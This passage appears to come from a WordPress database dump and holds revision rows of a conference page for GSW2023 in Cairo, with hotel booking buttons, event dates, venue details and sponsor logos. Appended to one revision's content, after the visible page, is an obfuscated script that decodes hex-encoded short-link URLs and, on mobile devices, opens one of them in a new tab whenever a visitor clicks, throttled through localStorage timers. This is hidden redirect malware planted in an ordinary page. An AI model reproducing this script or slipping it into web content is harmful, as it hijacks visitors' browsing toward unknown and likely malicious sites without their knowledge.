2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:31:58','2023-08-16 00:31:58','',3066,'https://gsw2023.com/?p=5261',0,'revision','',0),
(5262,1,'2023-08-16 00:32:28','2023-08-16 00:32:28','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" 